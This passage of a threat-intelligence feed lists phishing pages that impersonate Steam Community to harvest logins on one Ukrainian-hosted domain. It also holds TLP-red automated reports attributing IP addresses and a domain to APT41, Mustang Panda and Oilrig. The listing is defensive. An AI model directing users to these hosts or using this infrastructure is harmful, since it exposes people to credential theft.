{ + "pageHtml": { + "hashSha256": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "filetype": "pageHtml", + "filename": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "filetype": "pageScreen", + "filename": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "afcd42feb05c0b9b4e725e4266bd1e9ca092627706f954750f7ec38b168e7820", + "url": "http://accsteamorigin.sells.com.ua/command-conquer-red-alert-3/p27", + "date": { + "blocked": "2017-11-07T05:06:19+03:00", + "added": "2017-10-11T22:45:22+03:00", + "detected": "2017-10-11T22:45:22+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "filetype": "pageHtml", + "filename": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "filetype": "pageScreen", + "filename": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "32268ec99874164fb09655e899adcc44964a9b88844919fc9b6fc0930d188344", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:20+03:00", + "detected": "2017-10-11T22:14:20+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "filetype": "pageHtml", + "filename": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "399987ec3383d660e5833b7396a817884fbe2eb8a14eae715bfeb8bcce329978", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=name", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:24+03:00", + "detected": "2017-10-11T22:14:24+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "filetype": "pageHtml", + "filename": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d3b85abb6f339983ae8378ac1d3d7b2bd28d9e07c6e6de7d42a34f46c99c2ad6", + "url": "http://accsteamorigin.sells.com.ua/empire-total-war/p2", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:09:09+03:00", + "detected": "2017-10-11T22:09:09+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "filetype": "pageHtml", + "filename": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "filetype": "pageScreen", + "filename": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d21964c861da14ca52dc598458157e8ef38d2d75110e0244396290e0fd0c8bc3", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?size=10&=amp", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:03:13+03:00", + "detected": "2017-10-11T22:03:13+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "filetype": "pageHtml", + "filename": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "filetype": "pageScreen", + "filename": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "71fa641ca0260cf5097cdc94363af3cca077903d73ef51dbf84d2fe966da00e1", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2", + "date": { + "blocked": "2017-12-07T07:23:49+03:00", + "added": "2017-10-11T21:46:48+03:00", + "detected": "2017-10-11T21:46:48+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "filetype": "pageScreen", + "filename": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52ebffd121be60515ce9403b425c11b7724b86c1259be50196e2b81c8cb70534", + "url": "http://accsteamorigin.sells.com.ua/products?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:11+03:00", + "detected": "2017-10-11T21:42:11+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "filetype": "pageHtml", + "filename": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "546c7738cd52d6882b34f1a93adb1ff9864ef59ca255be91e0afc815bd3927c8", + "url": "http://accsteamorigin.sells.com.ua/products/2?sort=name", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:10+03:00", + "detected": "2017-10-11T21:42:10+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "filetype": "pageScreen", + "filename": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "6551900a64bcb77261de7b9c885aa26effe30064872c17de2a1fc1d435573ee1", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=30", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:55+03:00", + "detected": "2017-10-11T21:30:55+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "filetype": "pageHtml", + "filename": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "filetype": "pageScreen", + "filename": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "ef1a653812575dde248b8de44a80d999e4b498aac53d56ab7af1cf6f1d7edb6b", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=10", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:53+03:00", + "detected": "2017-10-11T21:30:53+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "filetype": "pageHtml", + "filename": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "filetype": "pageScreen", + "filename": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "12c1361579bffe67dd10524c20390a8e749072fbb838c25d9ac918d074a096ca", + "url": "http://accsteamorigin.sells.com.ua/klyuchi-steam/c6?sort=name", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "filetype": "pageHtml", + "filename": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "filetype": "pageScreen", + "filename": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "c3078d9cb7c580110c854c8a4c041655d012278626680a02b0bb985ab952ba0f", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=1", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "fcd6b9e192152cd4103b465cdfe7a539f5a0c76b5764b458aa68b1c0002b7e45", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2?sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:41+03:00", + "added": "2017-10-11T21:11:27+03:00", + "detected": "2017-10-11T21:11:27+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "filetype": "pageHtml", + "filename": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "filetype": "pageScreen", + "filename": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "38f94514e569b81b0fe264da5d48c93677332a017d217ac35bb59e369c7f34ab", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:53:30+03:00", + "detected": "2017-10-11T20:53:30+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "filetype": "pageHtml", + "filename": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bbee01e256e188625648aa5fe8c9db2d7b7298b6d03b229e24e1018617d45c0e", + "url": "http://accsteamorigin.sells.com.ua/products?sort=cheap&size=30", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:36:03+03:00", + "detected": "2017-10-11T20:36:03+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + } + ], + "displayOptions": { + "isFavourite": false, + "isHidden": false + } + } + ], + "seqUpdate": 1430425612098642 + }, + "apt/threat":{ + "count": 57, + "items": [ + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-23T23:20:09+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-24", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n APT41. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

95[.]179[.]134[.]240

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "description": null, + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "95.179.134.240" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271228138607, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-2320", + "sectors": [], + "seqUpdate": 17271360303706, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "name": "APT41" + }, + "title": "APT41 - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-24T03:00:30+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T03:50:06+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Mustang Panda. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

147[.]78[.]12[.]202

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d2fbd8a75768de39f022b3173babc0e7ec64a521", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "147.78.12.202" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271390119447, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "375efaa5e042b289579c147dd1c95d9b8ccdbee4" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0350", + "sectors": [], + "seqUpdate": 17272224218059, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "06aea4ef831ae0fe5c97348e47901fc7293ebd40", + "isAPT": true, + "name": "Mustang Panda" + }, + "title": "Mustang Panda - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:21+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T08:50:11+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Oilrig. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

-wehermes[.]com--
